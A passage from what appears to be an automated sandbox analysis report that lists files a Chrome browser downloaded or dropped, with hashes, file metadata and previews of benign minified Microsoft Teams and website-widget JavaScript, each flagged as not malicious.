                                                                                                                                                                                                                          Preview:define("@wsb/guac-widget-shared/lib/components/Carousel-7574d33c.js",["exports","~/c/_rollupPluginBabelHelpers","~/c/_commonjsHelpers","~/c/interopRequireDefault","~/c/_react_commonjs-external"],(function(e,t,n,i,r){"use strict";var o=n.c((function(e){function t(n){return e.exports=t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e.exports.__esModule=!0,e.exports.default=e.exports,t(n)}e.exports=t,e.exports.__esModule=!0,e.exports.default=e.exports})),s=n.c((function(e){var t=o.default;function n(e){if("function"!=typeof WeakMap)return null;var t=new WeakMap,i=new WeakMap;return(n=function(e){return e?i:t})(e)}e.exports=function(e,i){if(!i&&e&&e.__esModule)return e;if(null===e||"object"!==t(e)&&"function"!=typeof e)return{default:e};var r=n(i);if(r&&r.has(e))return r.get(e);var o={},s=Object.defineProperty&&Object.getOwnPropertyDescr
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (63777)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):63890
                                                                                                                                                                                                                          Entropy (8bit):5.24924468686098
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:fuKMpSt3kjUBjJROogL3SuhQO8GK+f5/cNbmZhkJv15cT1mG0o79xo4j37CtExRD:moOqSf1UMJOOWcKor
                                                                                                                                                                                                                          MD5:E24BED9C55DC2224DE92F9290DB6898E
                                                                                                                                                                                                                          SHA1:9EE122E99868758D26D399C1F9D9D3CBACEF6C8A
                                                                                                                                                                                                                          SHA-256:7FD2B3C64384FF55E2CE806A5810A9FA11F9C562D001233B9AE77A1206B11692
                                                                                                                                                                                                                          SHA-512:E47BE8F0D4EF05E4460EC40017E35165D43D69A9DE4CF42298ECF2466BBF97988E578AD52A1BE0EF7BAD9C9006227A83452FFC29B6EE990220656376CBA861CC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/global-auth-db63683c3dceeec4.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[838201],{80134:(e,t,n)=>{n.r(t),n.d(t,{GlobalAuthService:()=>be});var i=n(161024),a=n(417694),r=n(775251),s=n(935008),o=n(406138),c=n(802756),u=n(848020),d=n(332752),l=n(510139),h=n(211713),g=n(847431),_=n(366603),T=n(193021),A=n(553882),p=n(407404),v=n(955262),m=n(923226),S=n(191914),b=n(724801),f=n(34655),w=n(348532),I=n(565439),k=n(901456),y=n(188468),U=n(879462),R=n(319095),C=n(103757),E=n(355515),D=n(734025),M=n(805809),N=n(900301);const W=(e,t,n,i,a,r,s,o,c)=>{let u=n?{"content-type":"application/json","x-ms-client-capabilities":"x-ms-mto-enabled"}:{"content-type":"application/json"};const d={"X-TS-UseCache":"false"};o&&(u={...u,...c?d:{}});const l={url:`${i}?invalidate=${+new Date(Date.now())}`,method:a,headers:u,apiName:r,authOptions:{accountId:e,source:"tenants-service-endpoints"},correlationId:t};return s&&(l.body=s),l},$=e=>{const{authenticationResources:t,discover
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14466), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):14466
                                                                                                                                                                                                                          Entropy (8bit):5.325793887878328
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:UBv1+1sirzkTt/Ta1sirzNjdR1sirzrgFXhFh76cQJ:UBv16ToThqTJlTfgFXhFh76cQJ
                                                                                                                                                                                                                          MD5:79BE1DC904872919ED0832EB24DAC09F
                                                                                                                                                                                                                          SHA1:48EBA2141FBC6B51737BC6091C4C8C6C8BC755B5
                                                                                                                                                                                                                          SHA-256:585E4222AB14A20626250F16584CAACAE44B4CFC0770F9D24EA9EA86E50E4D1C
                                                                                                                                                                                                                          SHA-512:CBF73C3C93864952E8A4FB6BE07DA0A6FDE47D5C631141F981C9A90AEA3DBD37EC08480A93B7B069990AE5EFE9E22E1D59ECCDC804BFA974BF1347647240CFD5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/batched-remoteEntry-dee5c437121d5c6f0bda.js?cb=1734456117830
                                                                                                                                                                                                                          Preview:"use strict";var sidecarDiagnostics,sidecarChatZeroState,sidecarMeetApp,sidecarTflOnboarding,sidecarUserContext,sidecarI18nContext,sidecarHtmlSanitizerContext,sidecarAriaLiveContext,sidecarFocusManagementContext;(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[150699],{564961:(e,t,r)=>{var i={".":()=>Promise.all([r.e(587200),r.e(918681),r.e(750818),r.e(978582),r.e(733423),r.e(702584),r.e(49586),r.e(367927),r.e(268921),r.e(842549),r.e(459628),r.e(664062),r.e(994444),r.e(35871)]).then((()=>()=>r(431810)))},n=(e,t)=>(r.R=t,t=r.o(i,e)?i[e]():Promise.resolve().then((()=>{throw new Error('Module "'+e+'" does not exist in container.')})),r.R=void 0,t),a=(e,t,i)=>{if(i&&(r.tu=i),r.S){var n="default",a=r.S[n];if(a&&a!==e)throw new Error("Container initialization failed as it has already been initialized with a different share scope");return r.S[n]=e,r.I(n,t)}};r.d(t,{get:()=>n,init:()=>a})}},e=>{e.O(0,[921072],(()=>(564961,e(e.s=564961))));var t
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7979)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):8086
                                                                                                                                                                                                                          Entropy (8bit):4.542394330601067
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:kxpPTqixUsv1FEouEwUFNbgF3sTnF4m4/rbgI8DT1DdhWMJT:kvTL/7fbgxunF4m4Dbgn13JT
                                                                                                                                                                                                                          MD5:BCD0E506BC6CECA01C797848A1E18B4D
                                                                                                                                                                                                                          SHA1:83C4C588CC01313141E40BAB05D3D5053CA55DEA
                                                                                                                                                                                                                          SHA-256:0847EE837BA3D9F99BC54F557E11FC4A1BCDEB998F68AD2A5875BC25C567B45D
                                                                                                                                                                                                                          SHA-512:8BBB26B17FC40CA917EF87302C0F7B0E616A8BD67F5F49085CBA52E256335B2C29311432CF28F9BDF17D4741D729D0E10E45A12A46B7A3D7ED226A5D12E63E27
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[49749],{49749:(a,l,c)=>{c.d(l,{va_:()=>Z,i00:()=>e,aYy:()=>v,S61:()=>m,yDM:()=>L,nU0:()=>M,iAS:()=>H,p4K:()=>t,LMj:()=>u,Jtj:()=>i,OEF:()=>V,csZ:()=>s,OL4:()=>D,I0J:()=>U,KDM:()=>r,K4O:()=>A,APn:()=>n,VyF:()=>g,x7t:()=>R,IuD:()=>o});var h=c(693935);const Z=(0,h.U)("Delete16Regular","16",["M7 3h2a1 1 0 0 0-2 0ZM6 3a2 2 0 1 1 4 0h4a.5.5 0 0 1 0 1h-.56l-1.2 8.84A2.5 2.5 0 0 1 9.74 15h-3.5a2.5 2.5 0 0 1-2.48-2.16L2.57 4H2a.5.5 0 0 1 0-1h4Zm1 3.5a.5.5 0 0 0-1 0v5a.5.5 0 0 0 1 0v-5ZM9.5 6c.28 0 .5.22.5.5v5a.5.5 0 0 1-1 0v-5c0-.28.22-.5.5-.5Zm-4.74 6.7c.1.75.74 1.3 1.49 1.3h3.5a1.5 1.5 0 0 0 1.5-1.3L12.42 4H3.57l1.19 8.7Z"]),e=(0,h.U)("Delete20Filled","20",["M8.5 4h3a1.5 1.5 0 0 0-3 0Zm-1 0a2.5 2.5 0 0 1 5 0h5a.5.5 0 0 1 0 1h-1.05l-1.2 10.34A3 3 0 0 1 12.27 18H7.73a3 3 0 0 1-2.98-2.66L3.55 5H2.5a.5.5 0 0 1 0-1h5ZM9 8a.5.5 0 0 0-1 0v6a.5.5 0 0 0 1 0V8Zm2.5-.5a.5.5 0 0 0-.5.5v6a.5.5 0
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 19x21, components 3
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):669
                                                                                                                                                                                                                          Entropy (8bit):5.687700387379596
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:SPb3SkEl9qvc150XyoseWlwqTIB5aSAgoPq7Z2TF8:/l8vc1spWJIDaRxG
                                                                                                                                                                                                                          MD5:3A6D11202EF8909AFDB634F33997F45C
                                                                                                                                                                                                                          SHA1:71C160699266293EFDFC308DC87F03C2B3E39A62
                                                                                                                                                                                                                          SHA-256:3B943E8B80AB9EE7FD4FB040BFB274F8FBE44A3FB33087A13B06DB74E3C316F8
                                                                                                                                                                                                                          SHA-512:4318169AC5F7047F85771DAD9DD34F50BC5CAD2815329027C80CA7C77FEB35F8C7B7F001390C4CBA928D3EED0830A417EBEA2327F6EE795E7270B23C044D8AC6
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......8c......8c................0210....................0100...........................................C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((...........".....................................+........................!."1...#$BCSt...............................)........................!....QARSr.................?.....x....z.b...@:..#.1x.....`........d.Ii..A..t..r.....L.......l..z..'k.z..4.3&..8R..gdv.s.UM..e.'}......=....z.`.....J.W9....EZ.\S.[..(...F...... ...q_..
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (36654)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):36762
                                                                                                                                                                                                                          Entropy (8bit):5.288359883284943
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:LXOQ44g23qw80xjOrb8pgInQhUzMpzRnzaqcpXR56d2g8Ke:AIXgInQW56Qg8p
                                                                                                                                                                                                                          MD5:1FB78A71F118BAC96FF6654EAD26BAFF
                                                                                                                                                                                                                          SHA1:5C6FF7F8096F0484CF6CCB016365A9616AB03A40
                                                                                                                                                                                                                          SHA-256:A008FCE5F9A5193555BB57D8E8BBDBA1F9646D5D69AA951856A5A299B463B449
                                                                                                                                                                                                                          SHA-512:48BB6DA6D399D3349ADF298B39E00B439ED60C14FCE0CAE006C5042A09B058CD7C3B79C21B0346A42CB84D369238033B4F4B728997B795DE57D5AA880BC7CDE8
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[690936],{297689:(e,t,s)=>{var r;s.d(t,{MP:()=>r,C9:()=>i}),function(e){e.default="default",e.skypeConCore="conCore",e.mediaAgent="mediaAgent",e.CDL="CDL",e.copilot="copilot"}(r||(r={}));Object.entries(r).map((([e,t])=>({label:e,value:t})));const i=new Set(["AppInfo.ClientType","Window.Type","Panel.Context","Session.TelemetryWorkerType","AppInfo.ExpIds","UserInfo.ETag","UserInfo.HostETag","Window.Type","AppInfo.Version","AppInfo.ExperienceName"])},336223:(e,t,s)=>{s.d(t,{M:()=>S});var r=s(923890),i=s(156054),n=s(239857),a=s(368848);const o={maxStorageSizeInBytes:5e6,storageKeyPrefix:"Teams:telemetry-instrumentation-offline-storage",minPersistenceLevel:2,eventsLimitInMem:null,inMemoMaxTime:15e3,inStorageMaxTime:1008e4,maxRetry:1,maxBatchsize:63e3,maxSentBatchInterval:15e3};var h,l;!function(e){e[e.ONLINE=1]="ONLINE",e[e.OFFLINE=2]="OFFLINE"}(h||(h={})),function(e){e[e.INTERNAL=
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14466), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):14466
                                                                                                                                                                                                                          Entropy (8bit):5.325793887878328
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:UBv1+1sirzkTt/Ta1sirzNjdR1sirzrgFXhFh76cQJ:UBv16ToThqTJlTfgFXhFh76cQJ
                                                                                                                                                                                                                          MD5:79BE1DC904872919ED0832EB24DAC09F
                                                                                                                                                                                                                          SHA1:48EBA2141FBC6B51737BC6091C4C8C6C8BC755B5
                                                                                                                                                                                                                          SHA-256:585E4222AB14A20626250F16584CAACAE44B4CFC0770F9D24EA9EA86E50E4D1C
                                                                                                                                                                                                                          SHA-512:CBF73C3C93864952E8A4FB6BE07DA0A6FDE47D5C631141F981C9A90AEA3DBD37EC08480A93B7B069990AE5EFE9E22E1D59ECCDC804BFA974BF1347647240CFD5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";var sidecarDiagnostics,sidecarChatZeroState,sidecarMeetApp,sidecarTflOnboarding,sidecarUserContext,sidecarI18nContext,sidecarHtmlSanitizerContext,sidecarAriaLiveContext,sidecarFocusManagementContext;(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[150699],{564961:(e,t,r)=>{var i={".":()=>Promise.all([r.e(587200),r.e(918681),r.e(750818),r.e(978582),r.e(733423),r.e(702584),r.e(49586),r.e(367927),r.e(268921),r.e(842549),r.e(459628),r.e(664062),r.e(994444),r.e(35871)]).then((()=>()=>r(431810)))},n=(e,t)=>(r.R=t,t=r.o(i,e)?i[e]():Promise.resolve().then((()=>{throw new Error('Module "'+e+'" does not exist in container.')})),r.R=void 0,t),a=(e,t,i)=>{if(i&&(r.tu=i),r.S){var n="default",a=r.S[n];if(a&&a!==e)throw new Error("Container initialization failed as it has already been initialized with a different share scope");return r.S[n]=e,r.I(n,t)}};r.d(t,{get:()=>n,init:()=>a})}},e=>{e.O(0,[921072],(()=>(564961,e(e.s=564961))));var t
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (19745)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):19853
                                                                                                                                                                                                                          Entropy (8bit):5.604146717589645
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:k5XMmHcOq7SbYI8N7RS7DYA5V6VdK08ImVk5jbdMT5nzhnJZcx8YyPUTqTM:KcmHcOq7SbYIS7+DYIAvK08c5tMFzhnA
                                                                                                                                                                                                                          MD5:78A705D92C0694D70744B816B2B49760
                                                                                                                                                                                                                          SHA1:B2D77A384EAB594BD872DF93CB3F5060CE0A0E4D
                                                                                                                                                                                                                          SHA-256:27D82842A7E0AEBBABF594098A8EF642883A2D4AE1FD4B35A33CC0D319BCA222
                                                                                                                                                                                                                          SHA-512:7B965924CA77EEB6D6C485E6601EA11EA3FC9D7AAE4C203B6B4023DE4C0B7D4D81A7745ACB80524E43483313D0B716AEEC483E563A7C94ED9B94F347618A8E22
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[478644],{792529:(e,a,t)=>{t.d(a,{e:()=>w});var i=t(513432),n=t(644525),r=t(854130);var o=t(411947),l=t(164093),f=t(250452),s=t(264278);const u=/[\(\[\{][^\)\]\}]*[\)\]\}]/g,d=/[\0-\u001F\!-/:-@\[-`\{-\u00BF\u0250-\u036F\uD800-\uFFFF]/g,c=/^\d+[\d\s]*(:?ext|x|)\s*\d+$/i,p=/\s+/g,m=/[\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF\u1100-\u11FF\u3130-\u318F\uA960-\uA97F\uAC00-\uD7AF\uD7B0-\uD7FF\u3040-\u309F\u30A0-\u30FF\u3400-\u4DBF\u4E00-\u9FFF\uF900-\uFAFF]|[\uD840-\uD869][\uDC00-\uDED6]/;function b(e,a,t){return e?(e=function(e){return(e=(e=(e=e.replace(u,"")).replace(d,"")).replace(p," ")).trim()}(e),m.test(e)||!(null==t?void 0:t.allowPhoneInitials)&&c.test(e)?"":function(e,a,t){let i="";const n=e.split(" ");return 0!==n.length&&(i+=n[0].charAt(0).toUpperCase()),t||(2===n.length?i+=n[1].charAt(0).toUpperCase():3===n.length&&(i+=n[2].charAt(0).toUpperCase())),a&&i.length>1?i.charAt(
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1317)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1425
                                                                                                                                                                                                                          Entropy (8bit):5.322530262992215
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:wp3sp38ngM5xx8FsJeybSOPqJRPmC0vkjaLd76hpa8AP3LipufqJNtPa5eEpa8Ay:wp3sp3H2xOs36ReC0cjaLt3quq/keJqn
                                                                                                                                                                                                                          MD5:1B6A88F9DD5747B566119263B842D4F0
                                                                                                                                                                                                                          SHA1:36FD7F0500944CFE6158015CD20049DA6220F9A9
                                                                                                                                                                                                                          SHA-256:E778D24A4A48AC146531FD90136935295D5FC2030E7565A0F4ADE82827E38C13
                                                                                                                                                                                                                          SHA-512:FB44C08F3DD03D9F0CEAB3B611079FA374AFEB235C4925A1C8750E768BEECAD43F421383148D1A59C3A963C46280B7DE95D73FF3E16F103755B3B5FA2B20C863
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[990521],{990521:(e,s,a)=>{a.d(s,{T:()=>n});var l=a(957032),C=a(395225),t=a.n(C),c=a(485529),i=a(829289);const n=(0,c.Ke)({svg:({classes:e})=>(0,l.Y)("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:e.svg,children:[(0,l.Y)("g",{className:t()(i.Q.outline,e.outlinePart),children:[(0,l.Y)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M8 2C6.89543 2 6 2.89543 6 4V14C6 15.1046 6.89543 16 8 16H14C15.1046 16 16 15.1046 16 14V4C16 2.89543 15.1046 2 14 2H8ZM7 4C7 3.44772 7.44772 3 8 3H14C14.5523 3 15 3.44772 15 4V14C15 14.5523 14.5523 15 14 15H8C7.44772 15 7 14.5523 7 14V4Z"}),(0,l.Y)("path",{d:"M4 6.00001C4 5.25973 4.4022 4.61339 5 4.26758V14.5C5 15.8807 6.11929 17 7.5 17H13.7324C13.3866 17.5978 12.7403 18 12 18H7.5C5.567 18 4 16.433 4 14.5V6.00001Z"})]}),(0,l.Y)("g",{className:t()(i.Q.filled,e.filledPart),children:[(0,l.Y)("path",{d:"M6 4C6 2.89543 6.8954
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2234)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):2342
                                                                                                                                                                                                                          Entropy (8bit):4.777133342218861
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:wp3sp3Lk0T3xl2DkuBuXLgQhsrrzb3fYosOVeCL1TworW7kFAQq:Vk02Dpcbh4rzDFVxpTwn0xq
                                                                                                                                                                                                                          MD5:934D2952A100D5FD1D5400A7DC870E88
                                                                                                                                                                                                                          SHA1:EC89C116E3D50D06BFDCB31CC2A3A4DC0F5BF87A
                                                                                                                                                                                                                          SHA-256:FBC293508A37DD05FDF4D716E965E6831920B4D76C0BB95A1E5BF621BF132976
                                                                                                                                                                                                                          SHA-512:A66A0213EAE6770956267802272180569F3EC79A3E8A4A967B25E4C0890D78E35E46E77526FAF390609FCD02FFCEAD0DB8083181158A5BE6E93012559D9794D5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/428348-eca109e63880cadf.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[428348],{428348:(e,L,a)=>{a.d(L,{s:()=>n});var s=a(513432),t=a(395225),C=a.n(t),l=a(485529),c=a(829289),n=(0,l.Ke)({svg:function(e){var L=e.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:L.svg},s.createElement("path",{className:C()(c.Q.outline,L.outlinePart),d:"M15.5 16.9989C15.7761 16.9989 16 17.2227 16 17.4989C16 17.7443 15.8231 17.9485 15.5899 17.9908L15.5 17.9989H4.5C4.22386 17.9989 4 17.775 4 17.4989C4 17.2534 4.17688 17.0493 4.41012 17.0069L4.5 16.9989H15.5ZM10.0001 2.0011C10.2456 2.0011 10.4497 2.1781 10.492 2.41137L10.5 2.50124L10.496 14.2951L14.1414 10.6468C14.3148 10.473 14.5842 10.4535 14.7792 10.5883L14.8485 10.6461C15.0222 10.8195 15.0418 11.0889 14.907 11.2839L14.8492 11.3532L10.3574 15.8532C10.285 15.9259 10.1957 15.9715 10.1021 15.9902L9.99608 16C9.83511 16 9.69192 15.9239 9.60051 15.8057L5.14386 11.35
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (43863)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):43971
                                                                                                                                                                                                                          Entropy (8bit):5.219897273461165
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:gtXZGCUCr0VC2CGC6Cv+26CDCBCICTIg17CWtBIY7/2emocxjVY21CWrO:gVICUCgC2CGC6CWLCDCBCICTpCWjGji/
                                                                                                                                                                                                                          MD5:AADD07657CFD0C9AC39F067D6AA88900
                                                                                                                                                                                                                          SHA1:0A829E66BE650CF343D705B4022A6F605FAF9928
                                                                                                                                                                                                                          SHA-256:8CBEF87A094C8C473ACE6DE5897EB9E4B524EDBDAB60F4EE5447C6B06C34DE37
                                                                                                                                                                                                                          SHA-512:FAEA6697A8DBDE2D51604DCE7E1C8564D300CC60B397A7D8B5C63A736DBF6ADC2290B9B4EE51FA93EA6A072A61F78E4C33766E52B8C7AFC0A48B114F2AECF343
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/137137-a4fd7f1e961d35fc.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[137137],{414250:(e,t,l)=>{l.d(t,{g:()=>C});var a=l(513432),C=(0,l(485529).Ke)({svg:function(e){var t=e.classes;return a.createElement("svg",{role:"presentation",focusable:"false",viewBox:"0 0 32 32",className:t.svg},a.createElement("path",{d:"M9.5 29H28.5C28.775 29 29 28.775 29 28.5V9H24.5C23.673 9 23 8.327 23 7.5V3H9.5C9.225 3 9 3.225 9 3.5V28.5C9 28.775 9.225 29 9.5 29Z",fill:"white"}),a.createElement("path",{d:"M28.293 8.00003L24 3.70703V7.50003C24 7.77503 24.225 8.00003 24.5 8.00003H28.293Z",fill:"white"}),a.createElement("path",{opacity:"0.64",fillRule:"evenodd",clipRule:"evenodd",d:"M29.56 7.854L24.146 2.439C23.8642 2.15891 23.4833 2.00117 23.086 2H9.5C8.673 2 8 2.673 8 3.5V28.5C8 29.327 8.673 30 9.5 30H28.5C29.327 30 30 29.327 30 28.5V8.914C30 8.514 29.844 8.137 29.56 7.854ZM24 3.707L28.293 8H24.5C24.2241 7.99945 24.0005 7.77591 24 7.5V3.707ZM9.5 29H28.5C28.775 29 29 2
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (6565)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):6673
                                                                                                                                                                                                                          Entropy (8bit):5.188554109702156
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:pFI31EXqP8+2Oj31wvm3YEZUVaIBlPC9aNMM1vbLIAVJeeQ2wz0cYW9a198:pYiXMwvUZCQaac1jwz0cM1u
                                                                                                                                                                                                                          MD5:903DB9F502EF645D912B50F781960FFA
                                                                                                                                                                                                                          SHA1:50C7B1E5533C892E5C5AC0A47485C0B5C158DE78
                                                                                                                                                                                                                          SHA-256:28CD6C823E1FA6F9A6DADECD2ED9FCBD55EB1FFE831CE0A7B3952C6804B21B9C
                                                                                                                                                                                                                          SHA-512:AF378F8600F59FFA1A5C70F6FC322416B555D506A9ABDC291EE443303B66C754A84754B4BB849D53EA36DE7B1762349C6C1CC7A2D01D2A4A4F173C54A885456E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[945208],{478331:(e,t)=>{var r=Symbol.for("react.element"),n=Symbol.for("react.portal"),o=Symbol.for("react.fragment"),u=Symbol.for("react.strict_mode"),a=Symbol.for("react.profiler"),c=Symbol.for("react.provider"),i=Symbol.for("react.context"),f=Symbol.for("react.forward_ref"),s=Symbol.for("react.suspense"),l=Symbol.for("react.memo"),p=Symbol.for("react.lazy"),y=Symbol.iterator;var d={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},_=Object.assign,h={};function m(e,t,r){this.props=e,this.context=t,this.refs=h,this.updater=r||d}function b(){}function v(e,t,r){this.props=e,this.context=t,this.refs=h,this.updater=r||d}m.prototype.isReactComponent={},m.prototype.setState=function(e,t){if("object"!=typeof e&&"function"!=typeof e&&null!=e)throw Error("setState(...): takes an object of state variables to u
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3971)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):4079
                                                                                                                                                                                                                          Entropy (8bit):5.303593149178301
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:AKyq75bqlUMjMzjy6YRQE5qQEPJbP2pGO63:ZVbIYH9QEPJbP2oR3
                                                                                                                                                                                                                          MD5:FF7BA3DED0CB6CDE2FDD7CC73AD36CC7
                                                                                                                                                                                                                          SHA1:7329F5FD2EF53DEC8220DB9CA69C7A058E8B4386
                                                                                                                                                                                                                          SHA-256:5B6C65EE1CC693700CF933136ED47345604718427FFAD38D638166DA4217E964
                                                                                                                                                                                                                          SHA-512:482AE7DF2909AE55250DB8EEAAA95B7FA92968802AF6C972C910BED2830B958813CBB263E73EDA6CC4AB27C3236D4BED8ECF8C4CA94F01FF0F8CCA0D36749A65
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/981746-a3168603d4db6f8f.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[981746],{987867:(e,n)=>{function t(e,n){var t=e.length;e.push(n);e:for(;0<t;){var a=t-1>>>1,r=e[a];if(!(0<i(r,n)))break e;e[a]=n,e[t]=r,t=a}}function a(e){return 0===e.length?null:e[0]}function r(e){if(0===e.length)return null;var n=e[0],t=e.pop();if(t!==n){e[0]=t;e:for(var a=0,r=e.length,l=r>>>1;a<l;){var u=2*(a+1)-1,o=e[u],s=u+1,c=e[s];if(0>i(o,t))s<r&&0>i(c,o)?(e[a]=c,e[s]=t,a=s):(e[a]=o,e[u]=t,a=u);else{if(!(s<r&&0>i(c,t)))break e;e[a]=c,e[s]=t,a=s}}}return n}function i(e,n){var t=e.sortIndex-n.sortIndex;return 0!==t?t:e.id-n.id}if("object"==typeof performance&&"function"==typeof performance.now){var l=performance;n.unstable_now=function(){return l.now()}}else{var u=Date,o=u.now();n.unstable_now=function(){return u.now()-o}}var s=[],c=[],f=1,b=null,p=3,d=!1,v=!1,y=!1,_="function"==typeof setTimeout?setTimeout:null,m="function"==typeof clearTimeout?clearTimeout:null,h="und
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (11245)
